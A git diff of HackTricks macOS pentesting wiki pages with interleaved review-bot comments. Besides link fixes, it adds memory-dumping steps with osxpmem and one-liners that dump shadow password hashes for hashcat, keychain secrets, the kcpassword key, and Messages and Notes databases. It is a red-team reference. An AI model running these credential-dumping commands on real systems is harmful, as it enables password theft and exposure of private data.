[macos-ipc-inter-process-communication](../macos-proces-abuse/macos-ipc-inter-process-communication/)
|
[macos-ipc-inter-process-communication](macos-ipc-inter-process-communication/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## macOS Kernel Extensions
|
## macOS Kernel Extensions
|
||||||
|
|
|
@ -256,7 +256,7 @@ int main(int argc, const char * argv[]) {
|
||||||
|
|
||||||
In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**.
|
In this page different ways to hook functions were discussed. However, they involved **running code inside the process to attack**.
|
||||||
|
|
||||||
In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](macos-library-injection/macos-dyld-hijacking-and-dyld\_insert\_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
|
In order to do that the easiest technique to use is to inject a [Dyld via environment variables or hijacking](../macos-dyld-hijacking-and-dyld\_insert\_libraries.md). However, I guess this could also be done via [Dylib process injection](macos-ipc-inter-process-communication/#dylib-process-injection-via-task-port).
|
||||||
|
|
||||||
However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations.
|
However, both options are **limited** to **unprotected** binaries/processes. Check each technique to learn more about the limitations.
|
||||||
|
|
|
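Review bot: in the edited sentence, `inject a [Dyld via environment variables or hijacking]` should read `inject a dylib via environment variables or hijacking`; dyld is the loader, the thing being injected is the library, and the linked page's own title (`Dyld Hijacking & DYLD_INSERT_LIBRARIES`) names the mechanism, not the payload. The new relative path `../macos-dyld-hijacking-and-dyld_insert_libraries.md` is consistent with SUMMARY placing `macos-function-hooking.md` under `mac-os-architecture/`, so only the wording needs a touch.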
@ -411,8 +411,8 @@ It was possible to **inject a simple shellcode** to execute a command because it
|
||||||
|
|
||||||
You can find **example dylibs** in (for example the one that generates a log and then you can listen to it):
|
You can find **example dylibs** in (for example the one that generates a log and then you can listen to it):
|
||||||
|
|
||||||
{% content-ref url="../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
||||||
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../macos-library-injection/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<details>
|
<details>
|
|
@ -1,4 +1,4 @@
|
||||||
# macOS Files, Folders & Binaries
|
# macOS Files, Folders, Binaries & Memory
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -45,8 +45,8 @@
|
||||||
|
|
||||||
MacOS stores information such as passwords in several places:
|
MacOS stores information such as passwords in several places:
|
||||||
|
|
||||||
{% content-ref url="broken-reference" %}
|
{% content-ref url="macos-sensitive-locations.md" %}
|
||||||
[Broken link](broken-reference)
|
[macos-sensitive-locations.md](macos-sensitive-locations.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## OS X Specific Extensions
|
## OS X Specific Extensions
|
||||||
|
@ -152,8 +152,8 @@ Mac OS binaries usually are compiled as **universal binaries**. A **universal bi
|
||||||
|
|
||||||
## macOS memory dumping
|
## macOS memory dumping
|
||||||
|
|
||||||
{% content-ref url="broken-reference" %}
|
{% content-ref url="macos-memory-dumping.md" %}
|
||||||
[Broken link](broken-reference)
|
[macos-memory-dumping.md](macos-memory-dumping.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Risk Category Files Mac OS
|
## Risk Category Files Mac OS
|
||||||
|
|
|
@ -0,0 +1,70 @@
|
||||||
|
# macOS Memory Dumping
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Memory Artifacts
|
||||||
|
|
||||||
|
### Swap Files
|
||||||
|
|
||||||
|
* **`/private/var/vm/swapfile0`**: This file is used as a **cache when physical memory fills up**. Data in physical memory will be pushed to the swapfile and then swapped back into physical memory if it’s needed again. More than one file can exist in here. For example, you might see swapfile0, swapfile1, and so on.
|
||||||
|
* **`/private/var/vm/sleepimage`**: When OS X goes into **hibernation**, **data stored in memory is put into the sleepimage file**. When the user comes back and wakes the computer, memory is restored from the sleepimage and the user can pick up where they left off.
|
||||||
|
|
||||||
|
By default in modern MacOS systems this file will be encrypted, so it might be not recuperable.
|
||||||
|
|
||||||
|
* However, the encryption of this file might be disabled. Check the out of `sysctl vm.swapusage`.
|
||||||
|
|
||||||
|
### Dumping memory with osxpmem
|
||||||
|
|
||||||
|
In order to dump the memory in a MacOS machine you can use [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
|
||||||
|
|
||||||
|
**Note**: The following instructions will only work for Macs with Intel architecture. This tool is now archived and the last release was in 2017. The binary downloaded using the instructions below targets Intel chips as Apple Silicon wasn't around in 2017. It may be possible to compile the binary for arm64 architecture but you'll have to try for yourself.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#Dump raw format
|
||||||
|
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||||
|
|
||||||
|
#Dump aff4 format
|
||||||
|
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
|
||||||
|
```
|
||||||
|
|
||||||
|
If you find this error: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` You can fix it doing:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
|
||||||
|
sudo kextutil "/tmp/MacPmem.kext"
|
||||||
|
#Allow the kext in "Security & Privacy --> General"
|
||||||
|
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||||
|
```
|
||||||
|
|
||||||
|
**Other errors** might be fixed by **allowing the load of the kext** in "Security & Privacy --> General", just **allow** it.
|
||||||
|
|
||||||
|
You can also use this **oneliner** to download the application, load the kext and dump the memory:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
sudo su
|
||||||
|
cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
|
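Review bot: the download-and-load one-liner at the end of this file depends on `wget`, which a stock macOS install does not ship, so it fails before anything is downloaded; `curl -L -o osxpmem-2.1.post4.zip https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip` works on an unmodified system. Since that line then runs `kextload` as root on whatever was fetched, it should at least compare a checksum of the zip against a known-good value before loading the kernel extension, and the text should say so. Two wording fixes in the Swap Files section: "it might be not recuperable" should read "it might not be recoverable", and "Check the out of `sysctl vm.swapusage`" should read "Check the output of `sysctl vm.swapusage`" (its output shows whether swap is encrypted).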
@ -0,0 +1,189 @@
|
||||||
|
# macOS Sensitive Locations
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## Passwords
|
||||||
|
|
||||||
|
### Shadow Passwords
|
||||||
|
|
||||||
|
Shadow password is stored with the user's configuration in plists located in **`/var/db/dslocal/nodes/Default/users/`**.\
|
||||||
|
The following oneliner can be use to dump **all the information about the users** (including hash info):
|
||||||
|
|
||||||
|
```
|
||||||
|
for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done
|
||||||
|
```
|
||||||
|
|
||||||
|
[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**.
|
||||||
|
|
||||||
|
An alternative one-liner which will dump creds of all non-service accounts in hashcat format `-m 7100` (macOS PBKDF2-SHA512):
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo bash -c 'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex "[^_]*"); do plutil -extract name.0 raw $i | awk "{printf \$0\":\$ml\$\"}"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk "{printf \"$\"\$0}"; fi; done; echo ""; done'
|
||||||
|
```
|
||||||
|
|
||||||
|
### Keychain Dump
|
||||||
|
|
||||||
|
Note that when using the security binary to **dump the passwords decrypted**, several prompts will ask the user to allow this operation.
|
||||||
|
|
||||||
|
```
|
||||||
|
#security
|
||||||
|
secuirty dump-trust-settings [-s] [-d] #List certificates
|
||||||
|
security list-keychains #List keychain dbs
|
||||||
|
security list-smartcards #List smartcards
|
||||||
|
security dump-keychain | grep -A 5 "keychain" | grep -v "version" #List keychains entries
|
||||||
|
security dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)
|
||||||
|
```
|
||||||
|
|
||||||
|
### [Keychaindump](https://github.com/juuso/keychaindump)
|
||||||
|
|
||||||
|
The attacker still needs to gain access to the system as well as escalate to **root** privileges in order to run **keychaindump**. This approach comes with its own conditions. As mentioned earlier, **upon login your keychain is unlocked by default** and remains unlocked while you use your system. This is for convenience so that the user doesn’t need to enter their password every time an application wishes to access the keychain. If the user has changed this setting and chosen to lock the keychain after every use, keychaindump will no longer work; it relies on an unlocked keychain to function.
|
||||||
|
|
||||||
|
It’s important to understand how Keychaindump extracts passwords out of memory. The most important process in this transaction is the ”**securityd**“ **process**. Apple refers to this process as a **security context daemon for authorization and cryptographic operations**. The Apple developer libraries don’t say a whole lot about it; however, they do tell us that securityd handles access to the keychain. In his research, Juuso refers to the **key needed to decrypt the keychain as ”The Master Key“**. A number of steps need to be taken to acquire this key as it is derived from the user’s OS X login password. If you want to read the keychain file you must have this master key. The following steps can be done to acquire it. **Perform a scan of securityd’s heap (keychaindump does this with the vmmap command)**. Possible master keys are stored in an area flagged as MALLOC\_TINY. You can see the locations of these heaps yourself with the following command:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo vmmap <securityd PID> | grep MALLOC_TINY
|
||||||
|
```
|
||||||
|
|
||||||
|
**Keychaindump** will then search the returned heaps for occurrences of 0x0000000000000018. If the following 8-byte value points to the current heap, we’ve found a potential master key. From here a bit of deobfuscation still needs to occur which can be seen in the source code, but as an analyst the most important part to note is that the necessary data to decrypt this information is stored in securityd’s process memory. Here’s an example of keychain dump output.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo ./keychaindump
|
||||||
|
```
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
Based on this comment [juuso/keychaindump#10 (comment)](https://github.com/juuso/keychaindump/issues/10#issuecomment-751218760) it looks like these tools aren't working anymore in Big Sur.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### chainbreaker
|
||||||
|
|
||||||
|
[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner:
|
||||||
|
|
||||||
|
* Hashed Keychain password, suitable for cracking with [hashcat](https://hashcat.net/hashcat/) or [John the Ripper](https://www.openwall.com/john/)
|
||||||
|
* Internet Passwords
|
||||||
|
* Generic Passwords
|
||||||
|
* Private Keys
|
||||||
|
* Public Keys
|
||||||
|
* X509 Certificates
|
||||||
|
* Secure Notes
|
||||||
|
* Appleshare Passwords
|
||||||
|
|
||||||
|
Given the keychain unlock password, a master key obtained using [volafox](https://github.com/n0fate/volafox) or [volatility](https://github.com/volatilityfoundation/volatility), or an unlock file such as SystemKey, Chainbreaker will also provide plaintext passwords.
|
||||||
|
|
||||||
|
Without one of these methods of unlocking the Keychain, Chainbreaker will display all other available information.
|
||||||
|
|
||||||
|
### **Dump keychain keys**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#Dump all keys of the keychain (without the passwords)
|
||||||
|
python2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain
|
||||||
|
```
|
||||||
|
|
||||||
|
### **Dump keychain keys (with passwords) with SystemKey**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# First, get the keychain decryption key
|
||||||
|
# To get this decryption key you need to be root and SIP must be disabled
|
||||||
|
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey && echo
|
||||||
|
## Use the previous key to decrypt the passwords
|
||||||
|
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||||
|
```
|
||||||
|
|
||||||
|
### **Dump keychain keys (with passwords) cracking the hash**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Get the keychain hash
|
||||||
|
python2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain
|
||||||
|
# Crack it with hashcat
|
||||||
|
hashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt
|
||||||
|
# Use the key to decrypt the passwords
|
||||||
|
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||||
|
```
|
||||||
|
|
||||||
|
### **Dump keychain keys (with passwords) with memory dump**
|
||||||
|
|
||||||
|
[Follow these steps](..#dumping-memory-with-osxpmem) to perform a **memory dump**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords
|
||||||
|
# Unformtunately volafox isn't working with the latest versions of MacOS
|
||||||
|
python vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump
|
||||||
|
|
||||||
|
#Try to extract the passwords using the extracted keychain passwords
|
||||||
|
python2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
|
||||||
|
```
|
||||||
|
|
||||||
|
### **Dump keychain keys (with passwords) using users password**
|
||||||
|
|
||||||
|
If you know the users password you can use it to **dump and decrypt keychains that belong to the user**.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#Prompt to ask for the password
|
||||||
|
python2.7 chainbreaker.py --dump-all --password-prompt /Users/<username>/Library/Keychains/login.keychain-db
|
||||||
|
```
|
||||||
|
|
||||||
|
### kcpassword
|
||||||
|
|
||||||
|
The **kcpassword** file is a file that holds the **user’s login password**, but only if the system owner has **enabled automatic login**. Therefore, the user will be automatically logged in without being asked for a password (which isn't very secure).
|
||||||
|
|
||||||
|
The password is stored in the file **`/etc/kcpassword`** xored with the key **`0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F`**. If the users password is longer than the key, the key will be reused.\
|
||||||
|
This makes the password pretty easy to recover, for example using scripts like [**this one**](https://gist.github.com/opshope/32f65875d45215c3677d).
|
||||||
|
|
||||||
|
## Interesting Information in Databases
|
||||||
|
|
||||||
|
### Messages
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sqlite3 $HOME/Library/Messages/chat.db .tables
|
||||||
|
sqlite3 $HOME/Library/Messages/chat.db 'select * from message'
|
||||||
|
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment'
|
||||||
|
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages'
|
||||||
|
sqlite3 $HOME/Suggestions/snippets.db 'select * from emailSnippets'
|
||||||
|
```
|
||||||
|
|
||||||
|
### Notifications
|
||||||
|
|
||||||
|
You can find the Notifications data in `$(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/`
|
||||||
|
|
||||||
|
Most of the interesting information is going to be in **blob**. So you will need to **extract** that content and **transform** it to **human** **readable** or use **`strings`**. To access it you can do:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/
|
||||||
|
strings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
### Notes
|
||||||
|
|
||||||
|
The users **notes** can be found in `~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite`
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite .tables
|
||||||
|
|
||||||
|
#To dump it in a readable format:
|
||||||
|
for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
|
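Review bot: `secuirty dump-trust-settings [-s] [-d]` in the Keychain Dump block is misspelled and will fail with "command not found"; it should be `security dump-trust-settings [-s] [-d]`. Three smaller points in the same file: the link `[Follow these steps](..#dumping-memory-with-osxpmem)` in the memory-dump section points at the parent README, which after this commit only carries a content-ref under `## macOS memory dumping`, so the anchor should be `macos-memory-dumping.md#dumping-memory-with-osxpmem`; in the Notes loop `writefile('body1.gz.z', ZDATA)` writes a lowercase `.z` while `zcat body1.gz.Z` reads an uppercase `.Z`, which only works on a case-insensitive volume, so the two names should match; and "Unformtunately" in the volafox comment should be "Unfortunately".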
@ -28,16 +28,16 @@ Library Injection is a technique wherein an attacker **forces a process to load
|
||||||
|
|
||||||
Function Hooking involves **intercepting function calls** or messages within a software code. By hooking functions, an attacker can **modify the behavior** of a process, observe sensitive data, or even gain control over the execution flow.
|
Function Hooking involves **intercepting function calls** or messages within a software code. By hooking functions, an attacker can **modify the behavior** of a process, observe sensitive data, or even gain control over the execution flow.
|
||||||
|
|
||||||
{% content-ref url="macos-function-hooking.md" %}
|
{% content-ref url="../mac-os-architecture/macos-function-hooking.md" %}
|
||||||
[macos-function-hooking.md](macos-function-hooking.md)
|
[macos-function-hooking.md](../mac-os-architecture/macos-function-hooking.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Inter Process Communication
|
### Inter Process Communication
|
||||||
|
|
||||||
Inter Process Communication (IPC) refers to different methods by which separate processes **share and exchange data**. While IPC is fundamental for many legitimate applications, it can also be misused to subvert process isolation, leak sensitive information, or perform unauthorized actions.
|
Inter Process Communication (IPC) refers to different methods by which separate processes **share and exchange data**. While IPC is fundamental for many legitimate applications, it can also be misused to subvert process isolation, leak sensitive information, or perform unauthorized actions.
|
||||||
|
|
||||||
{% content-ref url="macos-ipc-inter-process-communication/" %}
|
{% content-ref url="../mac-os-architecture/macos-ipc-inter-process-communication/" %}
|
||||||
[macos-ipc-inter-process-communication](macos-ipc-inter-process-communication/)
|
[macos-ipc-inter-process-communication](../mac-os-architecture/macos-ipc-inter-process-communication/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
|
@ -46,8 +46,8 @@ You can check if a binary has **hardenend runtime** with `codesign --display --v
|
||||||
|
|
||||||
Find a example on how to (ab)use this and check the restrictions in:
|
Find a example on how to (ab)use this and check the restrictions in:
|
||||||
|
|
||||||
{% content-ref url="macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
||||||
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Dylib Hijacking
|
## Dylib Hijacking
|
||||||
|
@ -101,8 +101,8 @@ A nice **report with technical details** about this technique can be found [**he
|
||||||
|
|
||||||
**Example**
|
**Example**
|
||||||
|
|
||||||
{% content-ref url="macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
|
||||||
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Dlopen Hijacking
|
### Dlopen Hijacking
|
||||||
|
|
|
@ -21,30 +21,30 @@ If you manage to **compromise admin credentials** to access the management platf
|
||||||
|
|
||||||
For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work:
|
For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work:
|
||||||
|
|
||||||
{% content-ref url="macos-security-and-privilege-escalation/macos-mdm/" %}
|
{% content-ref url="macos-mdm/" %}
|
||||||
[macos-mdm](macos-security-and-privilege-escalation/macos-mdm/)
|
[macos-mdm](macos-mdm/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
And also about **MacOS** "special" **network** **protocols**:
|
And also about **MacOS** "special" **network** **protocols**:
|
||||||
|
|
||||||
{% content-ref url="macos-security-and-privilege-escalation/macos-protocols.md" %}
|
{% content-ref url="macos-protocols.md" %}
|
||||||
[macos-protocols.md](macos-security-and-privilege-escalation/macos-protocols.md)
|
[macos-protocols.md](macos-protocols.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Active Directory
|
## Active Directory
|
||||||
|
|
||||||
In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages:
|
In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages:
|
||||||
|
|
||||||
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
|
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
|
||||||
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
|
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
{% content-ref url="../windows-hardening/active-directory-methodology/" %}
|
{% content-ref url="../../windows-hardening/active-directory-methodology/" %}
|
||||||
[active-directory-methodology](../windows-hardening/active-directory-methodology/)
|
[active-directory-methodology](../../windows-hardening/active-directory-methodology/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
{% content-ref url="../network-services-pentesting/pentesting-kerberos-88/" %}
|
{% content-ref url="../../network-services-pentesting/pentesting-kerberos-88/" %}
|
||||||
[pentesting-kerberos-88](../network-services-pentesting/pentesting-kerberos-88/)
|
[pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
